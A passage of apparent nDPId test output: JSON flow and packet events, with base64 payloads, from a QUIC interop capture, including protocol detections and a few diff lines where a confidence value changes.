WuVVt1AZfvz8bSBiibxOi0oZJkb4Skel7UVJq4ZUt\/AwshUTtNvBmdhQCuqFbi+vqgJQibSCoN9R4ZSyuDwh4LgKfjp+jo8uQyFbtI8t7MPDA2gEjE9qSW351YU9i5A\/s6I\/H0QY4qaYHU6kmhNbmIKATtEXjZl9SsVnMQ++X3XZU09ZdvRROedhNjBpUePUF2+I+GgpQe9uXNKuTX5eintxBFe\/K9\/CrJuH447MCSJbL3kP6Bf4Qg2eo6fEs5dY6Gxdja3GF51OjnRG43ifui\/tVzaMUi324TS\/XRgkk6p17f60JC6V4Gg40mbPu0O21JxeTFWtWMYV6jinEN5pHS5s61dr9fU3vtxIOEN\/xMZjMROyRyCA55e\/0gx+GVjszIFs+
UXq\/SyGgMEveU6gGW5EAZ3dCbJv6R+xa9kprk+rkDzgIuFc+I5Eg81JJd+kRHZiTfuhJaM8VwpyTDR71\/6\/lU7nCHcQiW3bXtU47eJyWza+vS4JMmYpHRxlNVbyyHp66eitmqcsnzcAlPI7xtrqCvg=="} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1603816434782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1603816434782,"pkt":"PKn0qB\/spJGxgjQ5CABFAAA\/AABAABwRNNQSvVT1wKgBgAG7iFcAK9mxgAAAAAAACPLo65bqtzD4+s6wDvrOsAH6zrAC\/wAAHf8AABs="} 00649{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434784,"flow_last_seen":1603816434784,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434784,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02148{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1603816434784,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434784,"pkt":"pJGxgjQ5PKn0qB\/sht1gCAvlBNgRQCABCwcKydWupNP+R2kegH0qBdAYDOmBAM0q4v2zvsWrrj0RUgTYFNnOCgoKCgghNSPe1nPIHwAARL5EcEFiriZrD+ET8JYIbR9oI0xm+rhrvJqfLILgs8D3Ue0qQNbVhIpNUU0tlgUCj3R+EB0BmYAvw6bLa5fuluEc0rN9r82heJLvapv7VUF9l51pFcem49jTWjYnj2oS6+waPQZXW+lgdvo6kQGqK89XfdzR1PgUM0aNtvz7T3DIGxshf8Bt0Mg12xV8BKvDf+WpUoRZwtsOWK2raSvEzJiBDtp9+7hN2cxP9JSjYr8Ymo+djN+4mxQxt78BMIwseR0wrK25i\/FCRyQZdy2RkGo1CRXgmyDAvyZwFE4TbrzLF307bQj1syPR3dOu7kPw5RNRQT+t3L+8NYL3mVwzg8kMaSuoFMxCZQvln3VAPeh3OJLvvw5+EMXFzx9zqWLfnKXdAHEumvxqEmlR\/1Fx5dKWAiLy4VEiB68pm8cbRcxMeWpZLJsU99vTYR1NQ7ym2LdsdYmsLFkMBHZj6r8XWpZpYhelGHgVf6dBgfvJoDoveKLzHHW7IQW0Q3CRZrurV397BZfMCs6JGA+7vvWU+gtIQ6+afCAD2BGOodmj\/NZoYjSTSz7UleFuiy\/Vh89Rle0L+paWGt8DSK3GtOoMd1TE8\/cyKXC0DuFP7OI\/tvNCsVqyrqekypnTROZiw\/hHDf4fjDoJUlr9W1Nwoksz+NUOe+agaP03VJPXO6c8eR1g16+4NUIoRiQvQ0PsA7\/u1\/P3EtbO6kdIsAPEzJh9T\/vDsjetpZCO9B\/5U78SmuNIpzUeyMa0pZ3WKYxs\/S8iP30dyOyRmNpGcQ2OhBlF2DpsSjXyEdMu816faZPTNRUFFFKzjtvsO4TkLkupS4QKX8ZqjlbPKIDbq7pJvPq1yQvdi8dyUb+GRdEu83F1kTyqMVj3VhOrCFJc0NwPk0QIQVaRiHCaQM\/M\/CAEON1vbjPSs5TR\/CU4ctB4lWQERooxF86Jf+vt4BRo+E+RBZpGyY9TSyW8BYhtJJUh4WEUdOJYaaV9TsJb\/JsQlajq3H+ad6FKE+sN0lRn0vyD+XLhK8WIG31ajHwqBioHhepDDhLwoYsiq3DO2TeKvxXp\/qbpXpHbmWZzrHqrW57rxAic64eJNK8nbylzcqNgf8E5i4dPbpF2trFKH9Xo28gQRRftLrNFAzIkDO4sN7G\/s0Kd5rqq+U4C+5hUgd+K5TPBViJ0+ZA5X+DO59wdV3YWk6fe3rpcJwZqkWMTHB+M4lLppO\/yNE76E8Kr\/Uqw7z2y9O2Hv+NvCttG9qY2iyEqocZxBUTD+UcJwLZ5GMkOh04nY5cKAEPxYCG+ZT+E6zrOvBnQQZqy8s3d7C7XsImaGAvBZu0AsMYvrJw6+l+x2h42qzLWSCCzqB8YHNMAoyjY5EEPiHDB4aqsw+AvUgp3kmejvZBqsLkmz4XspOgx4+v9KHKqq4bc+dtdIyTgZmNbhwtVFRrJwGMGlIJO3dYTW+eFWTrmyY\/kU+ejjmIORkV0nipRgO
em0UmubxMEgQZJeGXrQKTimh1Z9tS70mAbbB\/uGZjC6Urq2uLNfRgZdNhSsyCMoYQw8molzzh2Na0ZIW7YN2Gu\/\/Rf\/n13siixEZmXrzTIF7wcraimRKQ6DvgjgbL2hCWeF8mCngEFXTnoVA=="} -01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434784,"flow_last_seen":1603816434784,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434784,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434784,"flow_last_seen":1603816434784,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434784,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02156{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1603816434792,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434792,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAJ7ZAAEAR9yfAqAGAhfLO9KXYAbsE7LC9xgoKCgoI+QsGqtFYjA8AAETSGVf3NpHzKNMNdfh\/V\/noLzrrCJTWCW2izc6gcn2txyrZ3vTYFw9oti5N5Zd0a4DdA1cWLhNby0WoxjcoN3uUL31I6AuWTRtQmld72DVp1nFbW14vxWrhBIu4agIQU6NycrkwLEV1tOoKdYlrthTNMwD3M+k5+y\/jdMVtkD0R0YQR7BZOnM3kTX1bH0f\/eldh4oH8S4GerrQ\/hVn\/PHliyMbE95mBKeNH\/XBKjPaVH4SE5iyuZ4o0cAJX6zKU4lajsV6QVuEgsemLtfWCChsdFvaI+RSAzByJ2Y7eGCh7v+Gh4DXflSFSrZUSBAmTZoA0Zou6ukZtsJNjsWY68k6WygqpiwhMQJreLyjeXVzk7oyGDwHO\/hAvmg6xY5GXfBPf0ls2P2OW7n3w7L66S3D+as25Ka5fB\/1n04+oJmaw3ADdYqeBwRa3iSrQ7F7kK3NaNAJNRq2zS4fr\/b+ubURvNfR5staBQwIu\/o7Zb5+LwmaF9rZXHBu2Tz+8wv0lj8mhBUzLNtcfw27CNl1txh1+lvdEzBQ0+1QdwfOwk\/hlq7\/lf8GrfqmLhlEPTaPG7AFa3IPuxLh84mmZwaTAXQbxug33HwUz22AWbGI9PCbve31PjWm1LgNNd+7+kMpoKF52auR5lPAUr8zA5LwEBGR1mQkQ7NprWlORnGh5UWqvkJJHwL2k2IRTag51mGTH5MB1+cfSjVWNAtd\/8JuYCSBC+KNhtmuCXomT7rLvgXGj6o1sphXx4atNA9Dn9q1FcbinWgv+WKWZhnHGGP6dn+mrWu\/7bvpjXjrtDgIw7CyPxH34BjhKbxZ7QcB83XEhpxelpCRa6WUEloOBWGYIeMG0gZJIKjNZe0ll5C9J5n2Eq3sqg9KP3L2k8K+5dmEqspUGb1NUPPi+n6\/iFHU1fhMvh64hs66vVu1aXgLA9dFfJPSu+8U4SVAQ9LQIkLt1yLRcKmzv7K8F\/1wJz\/\/VA0FnXA\/S3tZfKvHD4A\/\/6XZ0e0JKAMn5kSF7uTeS5e5gdjg52fvbQjQd6m1d25cld76mtRwuKWprxy2fwcaEL3Y3Vh5fKfWjC4aclIK\/BmtRNjMNgHLI8jT0sKKwQDoyu6Dl2oMw70Jg67MXwUeukQTS75rXVHrbzUA2pmGH7aReYW35h4TyF+C9spNA\/zEJJt\/SQ8ZE+FX35GC6kc6V2qla+i+Pq5C7DccKCdXqXuLKAqiNDsgQ
zxhbb58C67FdYeSem4xijEQ544+5VsmSgDw5Bm+f8kn5ITiUXjSnERiDrW8LMlRKSAtIBNf8TTQIdO73pxNtEY6ZK+aCZSZfuGLY5fcX7OoNql4qaH5tgUcAKTmfbm2Rny2woTB6j6YC1lH0CTq+8yvsMUtLcbQZpIVgD2w91k\/DHu\/rqh55qa43XObRLAN1Cas7QHa1faPFa7Kyh\/Dx\/uu2xJFLfWHVfeKsvw4nX\/4k2v0Isffs\/nVZE\/mcAdyEmoN0MJ38PQMKNvx6iNUa45euWiJAQh0n\/9FPVkaW3p\/pu55m0RYAv15pyglEYDeOzb9cgqoBOBFbL5F17NfFlR1TUtETcnCdxPpozDGGzr8327bzSnjwgFfcwdPtJKYxjWOqhjxgehtiPwt9WJP1lnTBRJMRI29aK4qFwi9tCw=="} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1603816434794,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434794,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAVgBAAEARrFHAqAGAR8opqcRxEVIE7DJpzAoKCgoIvbmHXcmpQ\/MAAETSE2e30YHkAX2XVfEpCGfOjyF840fDKozk89FYV10qOipSbcKfBwadYKaP2PDi2A7GqANLJXLXd1Ra2Q\/d2lyOKDnoc8x8gM9WzcPPQTUPx43cTsdSrSCDxUnpnuaj6yGd2N3XRIkY0gYWRPuFX7h\/fh1NFO2iAOlIL6UUnbjkaQBPj5+DK9Tkt1jAUKuz5C\/VX5NyeiPZztoZxmFEUkRFMohO0yR1d9jvsEZjpJxu1T2xxVadymVUvn+nPUj7gyxMFoi5gdzyUkI6qww5VGYT9o89cKQc7vz3RQ1j5HNSltr8teBgazRyqIezFwRxXQZzC0mfyCRRks8zmpYilpgAUrd6iKSrwI8xpH1mLLYEiIEokh7Nku+MJsQdaeXhqFHBdzmvpP2d5lWx83GgFuE+Dkn\/A4rNg8OLbx8Hd749+SlXxx2p\/3FSVDsm0u8FwDQ0TGJxo01kEWYz07BfKbG+vmnmpdKMZ0c+mcf5\/mMTkSlmCtsSWEbhtyGBpHj6Gp3P\/PHHW6qpxotr0bYpBtsptMaDfY0LOv36qEIsdtyoyFrcuYBfxE2rbRJIu0Oe5vS9+mDEauvlYu+hTOBWRYf3GYbB3IuMocvdH3ge3fFDDBDMar6Z4AzQD3wB4++BlRSMJ4Op1PtaLNuhvgHr+zWIE03DBlRJ+VplDnanX09JNXhTwH3H+AjPz1EvGjgEK6+YfNJQaFV7U9mDD9Ruthi3HVvk8\/fOat3XDJUwyHcciWPLz4ceNf3L7rSem0SlSz\/9sPlFDV+6MnWDTjz2MgYr10nBv91OfLa6dUBNOUc77cMVlTY946uEOebqDqBU6HTwpDrQQPOhfekx\/cwyHgX1SPiQ2jm0cco9gMyY\/biNH5Ae0kYwjthPOjVJSM3sD8k6twZNkrRaDgELJdCga8uI83ZLsJc3njlrx+9GoCKhJeSUcJrXmCVv5wqbYrzBtzlNPONszxo+vENua67+NrZXgrgkQf3D5vueityfehPXawW3uctYARfHo8es3+9km4o77SaJb+CNNegl3uhaafpl6DgQ+IXvsGebd9bGzfvvtGEjqvC8
yYEyCoMopVY8b6KF028XUOHjcIIrxB9oRWGWX1t6qcAtpr5\/re1at\/9am5lVA7Gd9Xl3d+sVGUgFor51U\/E91\/+E5M5Qa008RYdjk8bxHdEi5qflOIKkQWLgH2ptDuy4K34mY60YaJX9MzZJHqAGBiOJyz2vC72RgiQqDDvCwlaJzHF+wCxLSno3fJNj+SzLPPJvdkMYQcGDVNBzW9gLntYHCPYZmwYktaxLJE5kbFfSUHtFwGEgRhMzIViDRf0rfOdiTfn8q1XUwHnBs2i86bgzg+ASxD5k9QGSx0i6DQMqkcfTxkRGAof6BOxVRYc9567BYEdhO\/\/6PdEmvCY3IgYkogHWhz0bGjMlwbJhFZn0\/rOkfEZRLdzHN3yIdh4NhKhCdUPWLn5T0v7ILIVw+5EDKoGAZZ6+44v3WJA9M5YTPJa8YeOn2nx3N3YEQRsjiBBWJmbxBrqvM2C\/FaZgvmTqe758ClWLW0UAseHM27RoZnUVhDYxYjRpjAi\/X3AjK7Y7RKIDkLHbl2y5Bqku+ZBD8\/fxJnSy0Fo82DtOYzY3K0yqjhL16Ji16juysw=="} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1603816434802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":89,"pkt_l4_len":35,"thread_ts_msec":1603816434802,"pkt":"PKn0qB\/spJGxgjQ5ht1gDen3ACMRMCABSAB4FwEBvnZO\/\/4EYx0gAQsHCsnVrqTT\/kdpHoB9EVLCfAAjD9qPAAAAAAAIIsGdLtPZLyX\/AAAd\/wAAGxoqOko="} 00565{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434806,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434806,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 
01188{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1603816434806,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434806,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA3rwAADIBPo3K7txcwKgBgAMDrQAAAAAARQAFAOUCQAAtEfp2wKgBgMru3FyV3hFRBOy8bMIKCgoKCDeSrwfZ37epAABE0hxlYo43miI9fcBT4NXlNvUyuqRzjALgZuz5ZEFwqFAJHCLIyiKMek3pvG1TfFtz+5dPcMlRmn1CpjYaJxtvjy1D8CXnaCGG32gK7yv0bsGVDyQR4j6nJT4\/BgeG5XzS2QksROzvNGVoOiM5mh9Gcivemi\/Ltw3i6ZMLxPmYmJjzRy5MQrmw7yWShK3Q0gjXLf\/AtAzYy4CwwNnnbu4HeZWuRph4yFsqigrFQzQiWW5R3FQS9VXQNOqcmpoWiLrZR6ybbeDMER5x2lrIuMbSZiBdtZBwZCB3UjQ8D6WXWUDqOreiLaatWU6Uu1Td\/atS+bPWsWkMIdZrEKUJ78RDCkU46YaC6J9gteAdBR7kDvpyMncXYbFq+wnVLl7bEkkrsFjuC3evFwokMfctXgYgQAfhg9lrv5W\/V8C8b+SLLGJ1OLOrQb7nrBWiHG6ErtKg2rmOgmj5TlcyL7QCWDLLcB4wY4DlINVS1W1uHvEQAamMqwBYJNWP\/j7R3\/z2LLwmYTggeZKmyJokcN4daQ+u2GrxKAd9n8ootJ6q14bjsfNDrGHdfa2X78HqV8e67EzuwM679YHyVDVcjdxmRT1W7vvW2odG2VW9n2hGz7F7x1SewA4VbmCgaMBt\/706B\/PIDrHOTJjIgOwT5HqHFLiW3qe6lZFlcg8="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434806,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434806,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.598216} 
+00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434806,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816434806,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":7.598216} 01197{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1603816434806,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434806,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJA9\/UAAC0BNJ8znmliwKgBgAMK13gAAAAARQAFAGANQAAwEYa3wKgBgDOeaWKq1xFSBOwXccwKCgoKCNp6o2ufRw8jAABE0iMFIf440snHtaQbpLTAJ\/\/X0Fab87I\/F+H+s8yGuc1DMj7IRCVccfx4Cactg6LpwLVqjp+zMpHzZNYgE+iBS5eSSQ5R1VIB3pIpWgR10BZu4jbgQ9OaBdQdBe6vEK8fOHQlW4z6tk88yOBPCZ9MOnhihM498wDmMjf47XEsFDB\/7XQLydimXkVgGcIAWfjRxaXaSbJMTKKvAYms0ejZnQnA1ViSWn1r\/yep9jMB4Ha216Bw+8\/bwb+zk8NWbJkU1joIp6LywbS8BKMNdkB8CvtxCpRm+uw4pI4+h7Ir2vhBxo8l109zWnww9jHcvrRJCAiVTzHX0IEoiynIkV5hfnomioZ+rfmWQ18DCMdbTm0g8xPqOvlcFJ4riKg6eD9T\/06FbQ\/gfMez3fH3QaSeBi2r\/TOHCN1q7d2RWFd\/zfCVFlJ5yK8kQ\/oLJ\/FOsWcUoocGzw5wDW2ZJKlMLUQVjXb6yA+tyXiZShAlzoYqYN0T4FvgLVOww\/BRgkMCtO+yhyv+IhNBUZ7HwVrODYj2Fkrg4imzgs1D4nwXIka\/LTCNZAzA2HaoTn\/7dnEMFUXWjYgl6Vcr7VmuvChO2Lk2W46SOWZvSzgpXd4SdNTImeyxURq7mYLuukLenDSue9Jo+fNHodI6Y4FhBpA6\/I5BPKpcZmf\/iYU="} 
02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1603816434806,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434806,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAlgRAAEARiNnAqAGAhfLO9LMfEVIE7M5rxAoKCgoIJ05Q063kdsUAAETSbVS8wmTCayioaeEDJ0E7Ag7cjypWJklnY03J30b1mdxIVOpIcCjzHgeNDAUeVGYchax6RLhjbFwwP3C\/qxh1OO8O83qldI1OYg6x3GPEV9dhbYkGdVcPi3mfVEvzh3eS8WnvbGq3a4H9q5E9mDKl7buMufgYFu2sl2hZ01ag0mTo116H4e6bMaTreq2mI8kmjdhWNv55TN2Tbo0qvafHS0QviZ2QSLwEnQh4J+FGfyqh3grvQtfWOnpdR8XEyF6DDe7LL\/KlLa4NwBuxumU\/mO\/SIZ8t8LmkA6HXglfpy4tEgA4X4H4bW8fdrEeEGZwPR7eDrKq9RqBC5oKz7o\/7sHblT4DHTu2jye83jOCQIrWBGQDr5qMowkCj2D+qE7I8qnehPTO3H56afZrW0y49JxTPEZjoHsKNr9nvjAleyeYuaG86WZoQwGHWl1q\/do2IozVSEZwB4ZhhqabxXQE\/bLsaV5zpA9VarwnHFfuqnigS8SW0VNHxqwF42AsxDhJ1ZhApy7feoO0PJvvB2oMY1tQHPKfitH7JeAITAfnhaBY2YdONDcZk5oBrPbcpcIaGvU\/fGwgBQ3eir6s7iNWqBonZzNxwiJDZOCaLqzesvSlVLwJWfVmI2gbBdEGORyuW8xbxQbWWWdwZ2ECu1W5iPFYWZNmDQ5+p+xP+v2p\/q9Zri2SEgtxNFAlFqBgYJSEcW+nfhelld\/8X+b4MFcnpWATco0d+cUaZqJ4oe\/SV5lTkb+r+kBl4Fi8vLnITjPgbX+wBQtuHCeIhIpPSGbKfX0e3KDUQANebIeZRTrYcajrn1fFRlg2x0mgRQZE3eh9zOE\/6NevPmRKd3whKrB4OrWwNw\/SlNsbpFrYxTvS9sFHtHn\/Uuh9Itnw6lb7ILr8jkDVyk4MOLQUBCbcYUCUwkQa6hAPdxDGJGAORwPlVdN1voToAmZpSEQkdedqob3cIiQWZE5mZWy5zSP4b+LhOHf9ORwzuNzfdlhFMGkZsYkTm4i9Glf9wL0Xp7g4iBWo1g\/ERgUa+jz9aU\/5pM9Q2WKNxTb0oWtxniWBS8Lxmsp0IiDMHvpKQ3FN7FMkHusFent8sdfLu8GN0db\/htJ0tYyNHKrn+\/ukQfcuGZu1CZ8pcapnxZCaWzdysytGbuUF0sN2\/rXvBKbrUoGOi\/yQYHoSWzZe4tWPuiFsnEL3ZfeQW8rimwLD7SocitIb0a8vtHdDj\/GmOBVkGDMBGCNjj8XxF6Z2FQBo+4oYwGZuGhSsfMXRlNNFIfFsIHDW9OAdCunv3+x5JsDNF8ukUbcH9anX6B8hHXxQel+qabQ+aJWYsgcN\/hIaoFyjxqHkiZZ0o818BWeuCXCM0HKhfsQvXHf4ucJSBS8pc2EzJ5EUcQ\/dllBKRQbIrXCSSmkQFN4Gab363GSeUDA3rD\/GBoK5b27D4o8WAAnT3izN4JAXB+H9hgMX9A0cMJMRRasU585OfR07ntlSr7v2dExw66EL\/j1gd3QF
NGbnOWToZJQicIfGV\/RtMUnXQYizsWgjoqWOPbw2wWrCqJhhbkxH+WHFJq0Mlwe32rpddmRI7+CtcRWBotdeJJ3xxfL7AYrxPw3cctN1iTAucOHdUCyCwYu\/wN2z2Li9nrj7J9G4sQVWMiuNy4Q=="} 02144{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1603816434812,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434812,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAqqBAAEAR4XfAqAGAKHC\/PNIfEVIE7NGPyAoKCgoIcBuNCNTaAX0AAETSdrPs58Nd4whderbUQKKE9lqbT2Q5dWXTzCU30Nuk49rwMOYzrP9hqurmfQzCfogq7GSDP2MPa19fV3S+tzaflHzUKhrCPd4WQ1zA7H6cNQz\/lRUSpnQOWA0uQAhhAk+IZiglMuTPFh7AnCe7BzheAkGio7m9ekHUnqgl2NpmpwBBQY2oKhqJXzck7whQvip39IREDqyYyokoeQbGf08lhmJrRyewd07SbXyZCbXrujwWAH9r0NguWbmeWQiWcLTQKzzy4g6sxprDxKvBtQqoDYhvf3TyqAO0JNQb6gL5PnsCQpPHeNU738v6N2EJwaCYld1aJc1nCH2E7UBhR1ArdPBQvdD2ti3qSdfkpRxzBao2iX1sHBqDyALe5QD\/8T0uZDT7mlUSPcUSCQVDdwUfo1H5Gw1rANt1KrnL+D7EeJEt30JdQogzd+25oyRRh\/N33koVbRPkvhHtyEiSOAqUcF2k5Cww7VSNAXDrSWJ3nfwrxyNNGcTk1vbfU9FQjS7xTsCs1DcL3tIwTh\/F\/WqE0Qefzo3L9DVZUBF95w+x+NrXTVfTMFyerU2W9IiTbdFPifHfNydqoB4UA6KdAkF420byZMA9uYn1eronWwg6zZLfNiMThXS7INZHCSmquoQM48twpJMiC8QLa2BKxvBs5MAXCaES3COreo36bEsm9T7MBNPrIFP83x9oS3Dwv962KtUHkL2c7dl+XXAGkrol0zp9I4duf7jIdkEwKt6bINytvQ7NOpnpqMe2V\/od99AzLNPugOYXhVlxSXXrKEIlIoBOH\/vFhTYqHBMHhKDUlY83Lqn6rlae+5ldEt\/PYxQqh9RlSvlTKizFbfa1Pqv6mluoxnZYLP\/Q1ytoMX++Rq54VSapX63zxer6E2Fc0D7Z6VXClsXzgGzvHubNlFS8CT4jYJOejwFK\/O29QfOBILbMoFfrRtMOMvJfvtl8oUyriiHZ+EYZfkq6QJnQfCI7a6a+eQggExHpUAScmRSiTG+IYeca3pfV6WTNGjJdxkNLPzA1Z5SNnLP6zTKrtTQschUTrKbBMGzeDxKanuLhkyCaGkNHJ+E9jo1kVSKyouGn1Xz0RovKIuTZdoKvIiFgJRBRTx8b8VxdFjPJBtQkuwYKYuNAT\/hv6yiy\/pQHRSFz+yZmlAIEJ6DuwyjItKkBePqNsaDsx8Am8smaYhsjEC8vmWFe5WEi20pG0HiVg5O5kSIY5y\/ziwUKkKhqlYGirFSKeTAYJVJpGBDrmIOk\/QXL5fYdpveFiq0l+piS3JuL7TGHxf5NvUDjc8PuuHAyslhM7YLSZqEKmlqBzNKi4Z+4Im8\/q3Qs2A9hPYC\/n9KxnKOeVVg7M
